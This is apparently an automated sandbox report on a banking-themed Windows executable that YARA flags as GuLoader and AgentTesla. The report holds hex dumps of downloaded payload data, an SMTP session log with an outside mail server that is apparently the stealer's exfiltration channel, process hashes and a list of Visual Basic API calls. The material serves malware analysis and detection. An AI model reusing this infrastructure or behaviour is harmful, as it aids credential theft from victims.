bf 79 1e 1b ac 0c 55 7e e8 b3 09 0c 57 19 93 55 87 ac e4 2f 32 56 34 39 60 85 10 6a 66 e8 c9 02 00 54 d5 d6 46 58 1d 70 55 92 52 82 68 75 3a 48 60 01 14 ea 32 7b ce 61 21 c4 da ec 6b 60 5b 30 67 04 03 9e b2 36 c7 db 67 f9 Data Ascii: ^RiF\|_ gd.GuV#T)t9L\|3yt&-~J{JAFTMn}_R V/JO]l\O*T$PtieN\|y[Td)04J-pGC61jf;yU~WU/2V49`jfTFXpURhu:H`2{a!k`[0g6g
2021-12-01 18:10:27 UTC	207	IN	Data Raw: 4f b7 48 96 a3 13 24 62 9c 02 98 d5 0c a7 72 3d 3f 35 e2 ef 34 bc 15 ea ad f8 70 25 f4 ca d5 c3 eb f6 bd 61 82 63 b0 fd 3d 50 de b8 92 52 f5 1c 7a 3e 95 83 86 76 32 30 b2 a8 6d d2 30 0a 73 3f d8 eb 86 dd 03 46 d4 bd 5f 0a 5b f5 96 89 67 43 40 6a 5e 91 87 52 d8 fe bc 9e a9 2f 1d df f3 2d 4d 52 ce 86 d9 f7 c6 4c d1 05 96 44 fd 34 3e c0 cb bb 8d b6 2f e6 62 fe 12 b8 b5 cf 59 8c d8 3f c5 1a 5a a5 23 ac 11 cf 80 5b d3 bd be cd 31 cd 40 4f 1b f4 67 de 6f 82 e0 38 c6 dd 10 e8 67 70 b1 a4 24 b5 ad 89 6e e8 82 a6 03 13 03 bc 67 8e 91 17 73 8a 22 11 d2 20 62 5c b0 00 67 2c 1e b4 d1 93 0f d4 aa 55 cf 7b 5e 29 20 f7 e6 0d b7 4b fc a1 82 e3 47 1d 41 d6 db b5 10 fc 04 b2 3b 56 f0 cd b0 85 51 f5 71 23 eb 1f 8c f4 88 98 ce 90 8f 8d ae 65 ff 54 8d 7e 35 fa 33 6e ce 33 c4 Data Ascii: OH$br=?54p%ac=PRz>v20m0s?F_[gC@j^R/-MRLD4>/bY?Z#[1@Ogo8gp$ngs" b\g,U{^) KGA;VQq#eT~53n3
2021-12-01 18:10:27 UTC	208	IN	Data Raw: 1a 76 b3 bd 20 e9 d6 aa 26 b3 2a d2 2c ad c2 0e f5 c4 88 31 0a fa 9f 03 30 05 b6 1b f0 74 ab 9b e7 49 45 5c 18 a1 7e 30 ef 52 49 f7 48 4e 58 6e 6d 68 7d 46 ce 58 f6 67 c9 72 05 67 11 a4 88 17 4f 24 e7 83 68 13 07 bc de 3c d2 42 e7 4c da 56 cf 60 0e ac 68 80 6d 96 6d c3 d1 e3 17 36 c7 73 4a 3e e8 a7 9c 50 bd f7 f0 25 c2 bc 7f 64 81 27 05 a6 b5 c3 35 c0 9a 50 34 a8 e9 10 d2 62 dc a5 2f 82 5e 78 04 31 73 bd 6a 2a a8 c8 e3 30 c5 d4 d9 8a a3 8d 2c c6 41 a8 74 d2 97 38 04 43 ea 82 a0 41 c2 c5 45 b8 06 99 9f d7 b5 69 9f 81 51 6d 49 5e f7 03 2a 0e 2e a5 5e b7 99 a4 0c 57 a8 09 92 ab a2 59 2f 9a 88 34 2a 4b 53 5e 3f 21 f3 f1 bd 15 43 77 fd a2 f7 e1 4e 83 73 55 7e ed 98 5b 8e 45 a0 75 64 be 86 b7 9b 66 07 3e 62 be d5 2b 67 c7 81 5b d6 17 57 f3 36 b5 16 35 75 c4 78 Data Ascii: v &,10tIE\~0RIHNXnmh}FXgrgO$h<BLV`hmm6sJ>P%d'5P4b/^x1sj0,At8CAEiQmI^.^WY/4KS^?!CwNsU~[Eudf>b+g[W65ux
2021-12-01 18:10:27 UTC	209	IN	Data Raw: dd 03 3b 4a d8 55 7d 1b a2 47 77 e4 a6 de 25 dd 5c 18 bf ee a0 bb f0 b9 9e f1 38 39 d4 d1 8d 05 fc 75 6f ad 62 18 31 aa 61 38 f0 9b 32 d0 e8 7e 6f 6e 50 a8 1b f9 b6 17 dd 2c 2b 32 ba c8 42 cf 5f d4 60 a4 32 a2 63 74 e1 6c 1f 50 b6 33 f4 30 fe c5 93 e3 0d ec 6e ec 8b 72 ad 04 78 69 46 17 1e 45 bc 42 8a ca fd 00 6a 85 ae b5 93 8a 80 d0 1b 8c 06 d2 89 60 15 b5 cf 73 82 9a 6e 68 1a d2 d0 fd 0a 3c 6c d5 de 38 bc 45 04 22 48 bf a8 e1 ab 57 24 a4 d4 3e 6f 7f 82 f3 fc 36 1f 36 0f 2c c2 60 f6 b3 aa bc db 4c 88 5a b3 9b 45 2d 25 ce d5 a8 93 b1 09 b3 7e 73 e7 9b b4 bc ab 38 1a fa 5b d8 a5 05 90 72 cd 50 7f 32 e7 ac 3f 8f f7 d3 e6 6f c8 7d b8 6e ca d7 dc cb b8 58 ab 08 22 6c 1a c2 db 0a ec 84 d1 61 b4 5e 84 03 0c 45 71 6f df c9 df 81 46 e5 4b b7 6f f7 69 1d ee f7 c8 Data Ascii: ;JU}Gw%\89uob1a82~onP,+2B_`2ctlP30nrxiFEBj`snh<l8E"HW$>o66,`LZE-%~s8[rP2?o}nX"la^EqoFKoi
2021-12-01 18:10:27 UTC	210	IN	Data Raw: 54 52 16 ad 0a b5 4a a9 ca 0d 63 f7 b8 7d 1c 1c a7 d3 63 6f 22 79 fe 2f ff 42 b3 41 3c 0d 45 6b 09 f9 f6 38 13 84 a2 6a 53 38 a5 bf 28 38 72 74 00 f6 27 8e 13 3d 4b 32 0d 4e 7b 9b 3c 0e ac 1c 62 91 29 02 02 02 41 2c 1d 7d 6a dd ec 5c bb b5 04 f9 ad 83 b0 f1 aa 06 30 e3 4c 7b 4d ee fa 48 8e 96 29 04 14 62 fc 42 a0 d9 64 a5 5c 01 48 70 16 84 b5 7e a0 25 a1 95 1f 59 77 d2 88 5a ed f0 4e 6f 82 f9 b4 8a 64 4d 33 50 b4 30 d2 6e e7 3a ab ce c1 63 3c 0c d8 15 3b 76 cc 8a 9b 1b b6 a0 04 48 d9 34 46 0a 09 df 53 76 eb df de 3c c5 40 04 bc e1 d5 b7 f8 b9 8f 94 20 24 c9 c2 8d 06 fc 74 7d bf 70 19 35 aa 6e 3c ec 9f 29 cc 67 e1 6b 50 52 ae 12 f3 31 ba dd 33 39 b7 1f cd 71 ce 56 df 46 a6 30 a2 7e 7a e5 68 1c 53 a8 21 f0 36 ef d6 12 6c 03 f5 7f fc 97 61 dd 13 d9 e4 55 89 Data Ascii: TRJc}co"y/BA<Ek8jS8(8rt'=K2N{<b)A,}j\0L{MH)bBd\Hp~%YwZNodM3P0n:c<;vH4FSv<@ $t}p5n<)gkPR139qVF0~zhS!6laU
2021-12-01 18:10:27 UTC	211	IN	Data Raw: b4 1d ee f7 ca 3e f6 55 69 b9 46 0b 09 57 55 2a 48 71 d4 b9 c7 0e b2 de a3 bd 3e 0b 5a 53 83 0a 48 b2 22 ac f6 6e b2 1f 52 2b a5 aa a8 72 91 78 e1 77 3d 8e a9 c1 c5 22 94 29 5d 00 40 fc f7 89 fd ba cb cf e2 db 0b 82 53 ef 06 44 b8 62 0f a5 50 82 fb 44 4d 6b bc 2b 85 a4 5f 58 6e c5 1b dc 9c 28 65 da c2 ec 91 01 d4 81 55 e6 4a f0 46 9c 43 c0 f5 66 b4 dc b0 be e1 28 0a 9f cd 1c ad 90 65 cc 45 6f a7 a7 7a de 58 8b 40 f6 f4 95 45 ec 83 5b 2f bd 7b 65 ba b4 bb 8b 8b d5 7c 1a 35 dc 52 5c b6 85 5c 94 74 19 97 7b 3a ec 6a f3 3c e6 55 05 fe c1 7b 00 eb 94 9c 33 76 0a fc bf 16 9b ab 61 08 bd ae e8 60 b3 a4 4c 96 c1 f7 81 cc 3b b2 1c 49 28 6b 99 2e 2c fe 7e 94 07 87 f7 36 aa f6 30 a4 e3 90 d0 45 d2 3f c0 02 cb 4c 16 d7 b8 7f af aa dd 4b c2 71 3d 41 df b5 67 bb bc f4 Data Ascii: >UiFWU*Hq>ZSH"nR+rxw=")]@SDbPDMk+_Xn(eUJFCf(eEozX@E[/{e\|5R\\t{:j<U{3va`L;I(k.,~60E?LKq=Ag
2021-12-01 18:10:27 UTC	212	IN	Data Raw: ae 0a 1a b9 aa 9f 68 40 66 ce e4 25 59 c2 82 4f 38 d8 65 fd dd d3 3c 5d fb 27 43 59 22 38 39 54 a3 9d 96 c7 44 19 16 87 de 95 bf 28 ef 11 be ac 8e fa 18 e3 35 c1 0c 3d be d0 d7 7c aa 71 48 26 c4 a6 49 11 a1 6c 84 ad 19 3e 9d 62 ea 51 41 90 1c 09 a7 56 bf cb 0a 64 67 4f c9 3e 13 b4 de 6a 67 37 fd c5 33 6e 27 90 5b 38 0b 55 59 8b e2 75 37 18 8a ae 6b 41 2a af aa 38 b4 df 72 09 f9 3d fa 1e 33 4d 39 07 60 74 8b 5b 01 a5 13 7e 80 a9 8d 10 1e 3a 37 05 74 65 40 68 5f a8 b4 1a eb 28 2a be 8a 8d 89 8c f9 71 74 42 7e 76 5b 89 b2 29 17 9c c3 eb 62 a9 d7 fa 76 61 0a 55 6d 16 84 a6 63 92 3e b6 85 8e c0 7e dd 89 46 d6 f6 4e 7d 97 da ae 88 44 5d b0 c3 b2 21 41 af 73 3a aa 82 d2 04 2f 1e 5b 8d 27 61 43 d3 92 19 a4 ae 91 fa 56 ab 2e 1c 14 c6 5d eb b6 d1 aa 28 c5 52 11 b4 Data Ascii: h@f%YO8e<]'CY"89TD(5=\|qH&Il>bQAVdgO>jg73n'[8UYu7kA8r=3M9`t[~:7te@h_(qtB~v[)bvaUmc>~FN}D]!As:/['aCV.](R
2021-12-01 18:10:27 UTC	214	IN	Data Raw: 36 34 4d d4 b6 90 b6 1c bc 65 e6 38 0a 35 6f b7 aa 4e a8 d0 21 ab 16 81 f0 da d2 b1 3c f1 ad 36 88 66 b5 e5 4d c7 6e 2b ae 2b f3 fc d9 b8 44 a9 22 2c 63 9f 0f cc a8 cd 8a 43 dd af 7b 98 1e 03 d9 b9 7e d1 e1 cf 13 09 c2 d6 63 60 72 b0 07 ed f8 4d 3f f6 4c 69 a0 49 60 13 db 74 31 4c 70 c3 8a e9 12 af d2 2f 8d 2a 1e 5d 72 90 89 77 aa 07 a5 e4 e8 9a 12 7c 35 bd a7 bd 43 9e 68 f8 65 b8 0a ad ce 41 7f 84 33 cd 1b 70 ea 75 af f3 a6 c1 c2 ea c6 0e 85 46 6b 1b 5d ad 7a 09 b1 44 9b e9 c7 08 77 dd 26 98 a6 5f 41 7d de 01 c3 90 aa fe d8 c8 e3 14 b6 c7 8a 60 e4 46 e0 49 18 d4 dd fb fa f1 db 20 2a 6a ab 09 03 8e 09 ad 83 65 df 49 7f 23 a1 71 ec d8 c5 55 fd e4 e1 52 6b 22 51 3b aa 69 56 b2 ba b7 98 86 d3 63 9f 7f d7 4f 5a a3 8e 5a 8d f6 56 8c 7e 24 e7 79 fe 6c e5 7f 11 Data Ascii: 64Me85oN!<6fMn++D",cC{~c`rM?LiI`t1Lp/]rw\|5CheA3puFk]zDw&_A}`FI jeI#qURk"Q;iVcOZZV~$yl
2021-12-01 18:10:27 UTC	215	IN	Data Raw: 56 64 8f db c4 34 ca 15 c5 44 ba 53 bd 24 e0 d5 20 c6 f7 ab 4d ce ec b5 b5 e6 28 8d a7 93 8c c9 5b d0 31 1b 70 55 17 b5 3a 57 d9 b4 97 48 a1 a5 d1 d6 c5 fc 31 8c 25 cf 05 d0 dc 5f 7c 27 e2 d4 d9 30 b4 ae 26 bf 53 fe e4 b1 5d 9d fb bd 83 48 35 39 83 7d c2 ed 4e c3 b6 98 f9 84 44 25 d4 6c ee da de 21 58 f4 a3 7e 51 a4 72 3e 2f 29 9c 9e ce 42 19 16 87 cd 93 bf 2e f2 1b 3b 11 90 e6 94 de 26 d2 02 00 bb d8 c0 ec 85 f6 46 23 ca a2 5c 86 ae f3 2c bd 7e 37 96 40 f6 59 55 0f a8 1a b3 5e a2 c2 10 72 64 4f f9 32 00 bf c4 ee 5c 37 15 f5 01 ee d1 09 65 38 25 45 43 14 ee 7f 31 0b 87 a8 73 6f 25 a0 a2 2a 32 69 72 1b ff 31 e7 11 26 44 13 0e 64 6f 8b b3 85 aa 07 ff c3 ba e7 10 05 3a b1 99 60 65 40 b1 50 a8 bb 95 b9 a4 8a bd 61 2e 0a 23 ea 43 f7 59 fe c1 5b 99 83 ab b4 1c Data Ascii: Vd4DS$ M([1pU:WH1%_\|'0&S]H59}ND%l!X~Qr>/)B.;&F#\,~7@YU^rdO2\7e8%EC1so%*2ir1&Ddo:`e@Pa.#CY[
2021-12-01 18:10:27 UTC	216	IN	Data Raw: 92 c1 95 4c ab de 95 0a 64 95 2e 92 84 0b ba c0 94 bb 0e d1 8e 60 1e b3 dd db 27 93 6c 7c 66 54 68 fb 1d 51 62 d7 df 1e be 44 0a 3a 4b bf a9 e9 a1 be 20 a7 c8 37 78 4a 06 6f f9 78 16 33 0f 28 d0 e2 37 b6 8e bc cd cc 4d 5a b3 8a 48 23 22 c1 d5 b4 83 b2 ff bd 6c f3 2e 89 3b 6d b9 bc cf 18 db 01 a9 05 97 71 d9 db a7 3a ff bd bf 31 72 30 fd 5e 49 d4 ac e9 2b db f4 c2 b1 54 8e 29 2a 76 97 14 d4 28 e6 9e 59 a8 af 7b 8d 0a 16 cd a1 5c da cb c5 09 8f d7 ca 64 77 70 bb 05 e0 ee 40 2b e3 55 54 be 5f 6a 13 c0 73 27 46 6b d9 a2 ed 07 b9 d3 2b 8c 30 2c 4a d1 13 80 71 bf 0a a8 e4 ed 8c 0b 76 08 b9 ae be 7e 99 72 e5 66 ba 12 bd 5f 41 34 91 23 5d 01 f0 e9 77 6e ec 39 4e ca e2 da 03 9a d7 6b 1f 47 b4 e4 86 ab 58 86 f0 57 cb e4 b2 2e 84 a2 53 de e1 c9 1c dd 9f 2a fc ca 48 Data Ascii: Ld.`'l\|fThQbD:K 7xJox3(7MZH#"l.;mq:1r0^I+T)v(Y{\dwp@+UT_js'Fk+0,Jqv~rf_A4#]wn9NkGXW.SH
2021-12-01 18:10:27 UTC	218	IN	Data Raw: 36 48 bb ff fa a4 7f fc 77 84 03 cb 74 7a 10 a0 c1 10 f9 1b 54 94 a1 d9 97 b1 d0 33 15 62 09 01 57 29 d8 e4 b4 54 13 f1 d7 6e 0a 3f 7a 25 51 97 f8 9c 8e 27 ee 2c bc aa 31 8a 39 28 d3 ad 88 93 a0 0f e6 0b 49 c8 a2 22 53 6b d4 52 08 42 7e 8f c1 59 c4 ca 14 74 5a 8b d6 0a a5 1e 45 e0 23 d9 a1 42 c6 fa 37 52 77 44 7c a6 30 bc c4 dc 28 2e 95 85 53 18 3d f2 4e 45 85 84 48 ae af cb 4b 21 e6 ac 68 3f c0 1b a4 da 59 7c 34 f7 df d7 3c b5 a8 35 98 5c f1 ff aa fc 00 fb be 82 e0 35 39 98 67 44 72 46 d8 3f d2 ff 82 62 3f c8 6c e6 cd 57 a5 5c fb 26 9a 56 37 b3 b5 47 33 14 78 ce 40 1e 0a 08 b6 99 b6 21 f0 09 35 1a 85 e5 97 d2 21 dd 87 f1 b8 c5 c7 f9 1a 76 53 2c f7 a7 5b 16 32 77 28 bd 97 dc 9a 45 ed 46 5e 10 b1 16 a8 4b b0 d7 0f 76 76 cf 79 32 0c 3b ef 6a 45 27 7e e2 a1 Data Ascii: 6HwtzT3bW)Tn?z%Q',19(I"SkRB~YtZE#B7RwD\|0(.S=NEHK!h?Y\|4<5\59gDrF?b?lW\&V7G3x@!5!vS,[2w(EF^Kvvy2;jE'~
2021-12-01 18:10:27 UTC	219	IN	Data Raw: ff c4 3e f4 bf ac 89 3d 28 54 db 88 07 fe 62 73 22 f5 1a 23 2b 67 36 fa b8 3c cb f4 f1 f3 4f 40 28 0f ea 90 36 dd 38 2b 33 a6 cd 70 4f 56 fa 61 ab 23 2b f0 74 f1 e9 82 54 b1 38 e0 b1 f7 c6 92 76 0b f4 6b e4 8b 65 c0 1c 5d 7c 45 16 26 41 ae c2 83 df b4 06 78 05 32 b5 89 8d a3 d3 07 03 99 dd 81 6a 01 aa 5f 56 26 8b e9 72 72 fc f0 ee 99 55 68 ff db 0d ac c5 93 3f 5e 3e a1 ed a3 43 a1 9a c3 13 7a 5a 94 71 c0 25 13 2e 0a 24 da e7 31 be 97 b9 d4 c9 45 56 bb 99 42 22 2e c4 c5 b5 81 a8 0f ad 72 f3 34 89 32 4d bb a5 ca e0 d5 0d d8 03 f8 73 be d0 97 3c d3 ac 0d 9d 61 31 ee 52 cc 61 af f2 33 db f4 d7 a5 4d b2 35 20 76 92 0f c3 36 e4 92 51 b5 b7 62 80 22 1f d8 a1 7e c8 c6 c5 1d 96 f2 d6 7a 60 6b a1 1c f6 f9 55 26 e3 54 72 ae d0 63 1e d5 74 25 c9 6d d7 b8 e5 12 b6 dd Data Ascii: >=(Tbs"#+g6<O@(68+3pOVa#+tT8vke]\|E&Ax2j_V&rrUh?^>CzZq%.$1EVB".r42Ms<a1Ra3M5 v6Qb"~z`kU&Trct%m
2021-12-01 18:10:27 UTC	220	IN	Data Raw: ec 43 72 02 e5 9a 89 21 f4 03 fe b1 18 93 a3 7c 0d a0 ab e6 7d b6 ac 44 8b c4 eb 9d de b9 93 14 54 2d 76 9c 33 29 f6 76 89 02 95 75 23 b7 f3 3e b9 e6 82 52 48 c0 bd cd 1f ce 51 13 ca bd 62 aa a4 d3 56 c7 63 bf 5c c2 b0 7a be a1 f1 31 48 b9 ed 7a 40 71 f2 7e 83 00 d9 f4 9e 02 20 25 18 f3 1b 57 86 21 3d 85 31 05 3d 17 6d 0e 04 46 a9 21 f6 34 b0 01 71 02 7c 8a db 72 2c 51 95 ea 1c 6a 29 ff ac 45 a2 36 88 2b a8 37 bf 08 77 ae 0f f5 19 c9 2c 90 a2 86 fa 4c ab 0a 4a 41 8d d3 59 28 d8 94 85 51 ab d2 18 25 f2 54 60 cb d7 ae 4c c1 fd 35 40 a7 a8 74 36 10 b9 d6 5c c4 3f 15 6d 5d 0a bd 27 5f c4 bd 8a 41 a9 ad d9 a3 cd f4 ac 84 2d c7 17 b9 d4 57 74 3a ea d1 d9 32 b6 a1 28 96 54 ec f1 23 dc 04 fa af 02 08 3b 37 96 6f 43 74 4f d1 37 d8 f7 8b 4a 38 da 64 f3 4f d6 3c 5d Data Ascii: Cr!\|}DT-v3)vu#>RHQbVc\z1Hz@q~ %W!=1=mF!4q\|r,Qj)E6+7w,LJAY(Q%T`L5@t6\?m]'_A-Wt:2(T#;7oCtO7J8dO<]
2021-12-01 18:10:27 UTC	221	IN	Data Raw: 5e cd 62 88 e5 58 8b 1b 6a 24 19 6e f9 dc 09 f1 7d db f2 6c 2c 0b ba fb 26 94 9b 25 16 f3 d7 c5 fd 27 2a 5d 67 91 52 b3 a6 08 5e 44 70 b6 78 18 2c af 7d 67 10 a1 f6 ef 64 97 9e 77 3b 34 ca 22 36 26 fd 42 60 d6 e3 e3 00 f8 7c 25 91 8d b0 ce 85 dc ff fc 59 5d 85 ad ea 76 95 1b 04 c4 09 68 0f a7 65 1e d0 b8 1c e2 c9 03 0f 2d 27 db 6e 95 c9 09 d1 27 19 92 03 e3 16 bc 2b aa 12 ed 5f cc 02 44 ee 62 23 7e d5 4e 81 55 92 b5 7f 0b 3d e4 64 ec 96 60 c8 01 58 69 54 97 83 40 bc 43 8b d8 94 04 6a 84 af bb 95 8a 83 d1 15 82 04 d5 89 62 14 bb de f3 27 99 68 7a 77 d4 f0 ff 18 51 62 d7 db 18 be 44 0a 3e 4c bf a9 e9 a5 51 23 a7 c8 33 7e 5b 86 f3 fd 38 16 33 0f 2c d0 e0 37 b6 8a bc c9 cc 4d 5e b3 9a 48 23 26 ce d5 b4 83 b6 0f bd 6c f3 2a 89 34 6d b9 b8 cf e8 db 01 ab 03 90 Data Ascii: ^bXj$n}l,&%']gR^Dpx,}gdw;4"6&B`\|%Y]vhe-'n'+_Db#~NU=d`XiT@Cjb'hzwQbD>LQ#3~[83,7M^H#&l4m

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 1, 2021 19:12:02.532605886 CET	587	49839	185.111.89.226	192.168.11.20	220-cpanel32.tarhelypark.hu ESMTP Exim 4.94.2 #2 Wed, 01 Dec 2021 19:12:02 +0100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Dec 1, 2021 19:12:02.533047915 CET	49839	587	192.168.11.20	185.111.89.226	EHLO 305090
Dec 1, 2021 19:12:02.555299044 CET	587	49839	185.111.89.226	192.168.11.20	250-cpanel32.tarhelypark.hu Hello 305090 [102.129.143.30] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-STARTTLS 250 HELP
Dec 1, 2021 19:12:02.555516005 CET	49839	587	192.168.11.20	185.111.89.226	STARTTLS
Dec 1, 2021 19:12:02.579087973 CET	587	49839	185.111.89.226	192.168.11.20	220 TLS go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Transferencia_29_11_2021 17.03.39.exe PID: 5360 Parent PID: 6940

General

Start time:	19:09:57
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe"
Imagebase:	0x400000
File size:	152688 bytes
MD5 hash:	A70CF8FDF5C68E414BAD4494A44F272A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: CasPol.exe PID: 3940 Parent PID: 5360

General

Start time:	19:10:12
Start date:	01/12/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe"
Imagebase:	0xfb0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.107619247628.0000000001390000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 4876 Parent PID: 3940

General

Start time:	19:10:12
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f230000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Transferencia_29_11_2021 17.03.39.exe PID: 5360 Parent PID: 6940 Transferencia_29_11_2021 17.03.39.exeCOMMON

Executed Functions

Function 0041C1E4, Relevance: 375.8, APIs: 174, Strings: 40, Instructions: 1267COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041C202
__vbaAryConstruct2.MSVBVM60(?,004029B0,00000002,?,?,?,?,00401546), ref: 0041C23C
__vbaVarDup.MSVBVM60 ref: 0041C261
#522.MSVBVM60(?,?), ref: 0041C274
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C287
#713.MSVBVM60(00000000,?,?,?,?), ref: 0041C28D
#558.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C2A9
__vbaFreeStr.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C2C3
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000008,00000008,00000000,?,?,?,?), ref: 0041C2DF
#541.MSVBVM60(?,7:7:7,?,?,?,00401546), ref: 0041C302
__vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C30E
__vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C318
__vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C323
__vbaVarDup.MSVBVM60 ref: 0041C348
#524.MSVBVM60(?,?), ref: 0041C35B
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C36E
#690.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C383
__vbaFreeStr.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C38E
__vbaFreeVarList.MSVBVM60(00000002,?,?,multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C3A3
#610.MSVBVM60(?,?,?,?,00401546), ref: 0041C3B2
#661.MSVBVM60(?,00402520,?,?,?,?,?,?,?,00401546), ref: 0041C3D5
__vbaVarTstGe.MSVBVM60(00008002,?), ref: 0041C3FC
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 0041C418
#705.MSVBVM60(00000002,00000000), ref: 0041C448
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041C452
__vbaFreeVar.MSVBVM60(00000002,00000000), ref: 0041C45D
#670.MSVBVM60(00000002,00000002,00000000), ref: 0041C469
__vbaStrVarMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C475
__vbaStrMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C47F
__vbaFreeVar.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C48A
__vbaVarDup.MSVBVM60 ref: 0041C4AF
#560.MSVBVM60(?), ref: 0041C4BB
__vbaFreeVar.MSVBVM60(?), ref: 0041C4D8
#648.MSVBVM60(0000000A,?), ref: 0041C518
__vbaFreeVar.MSVBVM60(0000000A,?), ref: 0041C52F
__vbaVarDup.MSVBVM60(0000000A,?), ref: 0041C590
#606.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041C59E
__vbaStrMove.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041C5AB
__vbaLenBstr.MSVBVM60(00000000,00000010,0000000A,0000000A,?), ref: 0041C5B1
#574.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C5CD
__vbaStrMove.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C5DA
#696.MSVBVM60(00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C5E0
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C602
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041C61A
#648.MSVBVM60(0000000A), ref: 0041C66A
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041C682
#696.MSVBVM60(OFFENTLIGHEDSSFRE,0000000A), ref: 0041C6B9
#696.MSVBVM60(Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041C6FD
__vbaNew2.MSVBVM60(004025A0,004223C0,Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041C722
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 0041C787
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000070), ref: 0041C7E3
__vbaFreeObj.MSVBVM60(00000000,?,004025B0,00000070), ref: 0041C808
#519.MSVBVM60(tilskrersaksene,?), ref: 0041C812
__vbaStrMove.MSVBVM60(tilskrersaksene,?), ref: 0041C81F
#519.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041C825
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041C832
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041C856
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041C896
#648.MSVBVM60(0000000A), ref: 0041C8B9
__vbaStrCopy.MSVBVM60 ref: 0041C8D9
__vbaFreeStr.MSVBVM60 ref: 0041C93D
__vbaFreeVar.MSVBVM60 ref: 0041C948
#527.MSVBVM60(Forretningsbrevet5), ref: 0041C95C
__vbaStrMove.MSVBVM60(Forretningsbrevet5), ref: 0041C969
__vbaFreeStr.MSVBVM60 ref: 0041C98A
__vbaStrCopy.MSVBVM60 ref: 0041C99A
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,000006F8), ref: 0041C9E2
__vbaStrMove.MSVBVM60(00000000,00401260,00402344,000006F8), ref: 0041CA12
__vbaFreeStr.MSVBVM60(00000000,00401260,00402344,000006F8), ref: 0041CA1D
#535.MSVBVM60(00000000,00401260,00402344,000006F8), ref: 0041CA22
#564.MSVBVM60(00000004,?), ref: 0041CA51
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041CA6B
#685.MSVBVM60(00000004,?), ref: 0041CA7F
__vbaObjSet.MSVBVM60(?,00000000,00000004,?), ref: 0041CA8C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402650,0000001C), ref: 0041CAD3
__vbaI4Var.MSVBVM60(?), ref: 0041CB02
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,000006FC), ref: 0041CB6E
__vbaFreeObj.MSVBVM60(00000000,00401260,00402344,000006FC), ref: 0041CB88
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041CB9D
